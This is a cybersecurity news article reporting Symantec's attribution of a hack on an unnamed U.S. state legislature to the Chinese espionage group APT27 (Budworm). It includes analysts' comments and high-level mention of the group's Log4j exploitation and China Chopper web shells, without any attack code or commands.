Chinese hacker in dark room showing cyber espionage

A Resurgent Chinese Cyber Espionage Group Hacked a U.S. State Legislature

Symantec recently warned about the return of a Chinese cyber espionage group behind cyber attacks on a U.S. state legislature.

The endpoint solutions company attributed the attack to APT27, also known as Budworm, Bronze Union, Emissary Panda, Lucky Mouse, Iron Tiger, and TG-3390 (Threat Group 3390).

During its six years of absence on U.S. soil, the threat actor was responsible for various attacks in Southeast Asia, the Middle East, and Europe.

Active since 2010, Budworm targets various industries to gather intelligence for the Chinese government for military and political purposes.

Chinese hackers compromised a state legislature

Symantec did not disclose the state legislative body compromised by the Chinese hackers.

However, the company’s threat intelligence team disclosed that the hackers compromised a network used by employees and legislatures.

Symantec did not disclose whether the group accessed sensitive materials or exfiltrated data.

Although the state legislative body might be the direct target, APT27 could also leverage the target to pivot to federal networks or the U.S. Congress.

This cyber attack is hardly surprising considering some U.S. legislators’ involvement in East Asian geopolitics, including the China-Taiwan issue.

“An organization without a strategic purpose for an adversary to target will be much less likely to find themselves the focus of nation-state level campaigns, but those who are or are simply unlucky will face a much more well equipped and sophisticated adversary,” said Chris Clements, VP of solutions architecture at Cerberus Sentinel.

Roger Grimes, a data-driven defense evangelist at KnowBe4, observed changes in target selection.

“In the past, most nation-state actors compromised targets associated with their adversary’s government and military,” Grimes said. “Now, today, the most common nation-state target is traditional organizations not directly aligned with governments or the military, although certainly governments and militaries are still greatly targeted.”

Chinese cyber espionage group gains new interest in U.S. organizations

Although the cyber espionage group targeted high-value assets, Symantec observed that “in recent years, the group’s activity appears to have been largely focused on Asia, the Middle East, and Europe.”

Among them are attacks on a government of a Middle Eastern country, a multinational electronics manufacturer, and more recently, a hospital in South East Asia and a US-based entity.

During its six years hiatus, Palo Alto Network’s Unit 42 researchers attributed APT27 to the compromise of one U.S. organization in November 2021.

Meanwhile, Symantec warned that a resumption of attacks against the United States signaled a change in the threat actor’s interest.

“A resumption of attacks against U.S.-based targets could signal a change in focus for the group.”

Chinese cyber espionage group suspected of hacking a defense contractor

CISA published a report about multiple APT groups compromising a defense industrial base organization for months.

Although CISA did not attribute the attack to any cyber espionage group, the tools, techniques, and procedures mirrored Budworm’s.

“… in recent months, Budworm has been linked to attacks against a U.S-based target. A recent CISA report on multiple APT groups attacking a defense sector organization mentioned Budworm’s toolset,” Symantec wrote.

Budworm cyber espionage group also actively exploited Log4j vulnerabilities to gain initial access and install web shells. The threat actor usually drops China Chopper web shells on compromised devices.

Coincidentally, the attack on a defense industrial base organization involved 17 China Chopper web shells dropped on a compromised Microsoft Exchange Server.

“In recent attacks, Budworm was observed exploiting Log4j vulnerabilities (CVE-2021-44228 and CVE-2021-45105) in the Apache Tomcat service to deploy web shells, and using virtual private servers (VPS) as command and control (C&C) servers.”

If Budworm’s involvement in the hacking of a defense company is confirmed, it would mark the group’s major success shortly after resuming attacks on U.S. organizations.

According to the NSA, FBI, and CISA, China represents the most dynamic threat to civilian, government, and military networks.